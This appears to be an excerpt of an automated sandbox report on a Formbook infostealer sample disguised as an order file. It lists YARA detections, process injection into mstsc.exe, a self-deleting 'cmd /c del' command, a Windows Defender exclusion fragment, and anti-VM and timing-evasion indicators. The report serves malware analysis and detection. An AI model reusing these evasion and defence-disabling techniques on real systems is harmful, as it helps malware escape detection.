          Source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Order 122001-220 guanzo.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@13/7
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Order 122001-220 guanzo.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:808:120:WilError_01
          Source: Order 122001-220 guanzo.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: Order 122001-220 guanzo.exeVirustotal: Detection: 62%
          Source: Order 122001-220 guanzo.exeMetadefender: Detection: 32%
          Source: Order 122001-220 guanzo.exeReversingLabs: Detection: 65%
          Source: unknownProcess created: C:\Users\user\Desktop\Order 122001-220 guanzo.exe 'C:\Users\user\Desktop\Order 122001-220 guanzo.exe'
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess created: C:\Users\user\Desktop\Order 122001-220 guanzo.exe C:\Users\user\Desktop\Order 122001-220 guanzo.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Order 122001-220 guanzo.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess created: C:\Users\user\Desktop\Order 122001-220 guanzo.exe C:\Users\user\Desktop\Order 122001-220 guanzo.exeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Order 122001-220 guanzo.exe'Jump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Order 122001-220 guanzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Order 122001-220 guanzo.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.684774940.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Order 122001-220 guanzo.exe, 00000001.00000002.708808706.00000000019DF000.00000040.00000001.sdmp, mstsc.exe, 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Order 122001-220 guanzo.exe, mstsc.exe
          Source: Binary string: mstsc.pdbGCTL source: Order 122001-220 guanzo.exe, 00000001.00000002.709202220.0000000003530000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdb source: Order 122001-220 guanzo.exe, 00000001.00000002.709202220.0000000003530000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.684774940.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0041B3B5 push eax; ret 1_2_0041B408
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0041B46C push eax; ret 1_2_0041B472
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0041B402 push eax; ret 1_2_0041B408
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0041B40B push eax; ret 1_2_0041B472
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_00414DB2 push ebx; retf 1_2_00414DBB
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_00416ED7 push es; ret 1_2_00416ED8
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0193D0D1 push ecx; ret 1_2_0193D0E4
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B2D0D1 push ecx; ret 3_2_04B2D0E4
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0085B3B5 push eax; ret 3_2_0085B408
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0085B402 push eax; ret 3_2_0085B408
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0085B40B push eax; ret 3_2_0085B472
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0085B46C push eax; ret 3_2_0085B472
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00854DB2 push ebx; retf 3_2_00854DBB
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00856ED7 push es; ret 3_2_00856ED8
          Source: initial sampleStatic PE information: section name: .text entropy: 7.76742936293
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Order 122001-220 guanzo.exe PID: 864, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 00000000008485E4 second address: 00000000008485EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 000000000084897E second address: 0000000000848984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe TID: 4660Thread sleep time: -101967s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe TID: 4944Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5588Thread sleep time: -50000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 6076Thread sleep time: -52000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeThread delayed: delay time: 101967Jump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000002.00000000.693486523.000000000A716000.00000004.00000001.sdmpBinary or memory string: 6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&^
          Source: explorer.exe, 00000002.00000000.684582296.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.693144077.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000002.00000000.685203487.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.693144077.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000002.00000002.939807233.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000002.00000000.693486523.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000002.00000000.684582296.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.684582296.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000002.00000000.693679167.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000002.00000000.684582296.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_00409B20 LdrLoadDll,1_2_00409B20
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01912990 mov eax, dword ptr fs:[00000030h]1_2_01912990
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E2D8A mov eax, dword ptr fs:[00000030h]1_2_018E2D8A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E2D8A mov eax, dword ptr fs:[00000030h]1_2_018E2D8A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E2D8A mov eax, dword ptr fs:[00000030h]1_2_018E2D8A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E2D8A mov eax, dword ptr fs:[00000030h]1_2_018E2D8A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E2D8A mov eax, dword ptr fs:[00000030h]1_2_018E2D8A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191FD9B mov eax, dword ptr fs:[00000030h]1_2_0191FD9B
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191FD9B mov eax, dword ptr fs:[00000030h]1_2_0191FD9B
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01912581 mov eax, dword ptr fs:[00000030h]1_2_01912581
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01912581 mov eax, dword ptr fs:[00000030h]1_2_01912581
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01912581 mov eax, dword ptr fs:[00000030h]1_2_01912581
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01912581 mov eax, dword ptr fs:[00000030h]1_2_01912581
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190C182 mov eax, dword ptr fs:[00000030h]1_2_0190C182
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191A185 mov eax, dword ptr fs:[00000030h]1_2_0191A185
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01911DB5 mov eax, dword ptr fs:[00000030h]1_2_01911DB5
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01911DB5 mov eax, dword ptr fs:[00000030h]1_2_01911DB5
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01911DB5 mov eax, dword ptr fs:[00000030h]1_2_01911DB5
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019651BE mov eax, dword ptr fs:[00000030h]1_2_019651BE
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019651BE mov eax, dword ptr fs:[00000030h]1_2_019651BE
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019651BE mov eax, dword ptr fs:[00000030h]1_2_019651BE
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019651BE mov eax, dword ptr fs:[00000030h]1_2_019651BE
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019135A1 mov eax, dword ptr fs:[00000030h]1_2_019135A1
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019669A6 mov eax, dword ptr fs:[00000030h]1_2_019669A6
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019161A0 mov eax, dword ptr fs:[00000030h]1_2_019161A0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019161A0 mov eax, dword ptr fs:[00000030h]1_2_019161A0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B05AC mov eax, dword ptr fs:[00000030h]1_2_019B05AC
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B05AC mov eax, dword ptr fs:[00000030h]1_2_019B05AC
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966DC9 mov eax, dword ptr fs:[00000030h]1_2_01966DC9
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966DC9 mov eax, dword ptr fs:[00000030h]1_2_01966DC9
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966DC9 mov eax, dword ptr fs:[00000030h]1_2_01966DC9
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966DC9 mov ecx, dword ptr fs:[00000030h]1_2_01966DC9
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966DC9 mov eax, dword ptr fs:[00000030h]1_2_01966DC9
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966DC9 mov eax, dword ptr fs:[00000030h]1_2_01966DC9
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01998DF1 mov eax, dword ptr fs:[00000030h]1_2_01998DF1
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EB1E1 mov eax, dword ptr fs:[00000030h]1_2_018EB1E1
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EB1E1 mov eax, dword ptr fs:[00000030h]1_2_018EB1E1
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EB1E1 mov eax, dword ptr fs:[00000030h]1_2_018EB1E1
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FD5E0 mov eax, dword ptr fs:[00000030h]1_2_018FD5E0
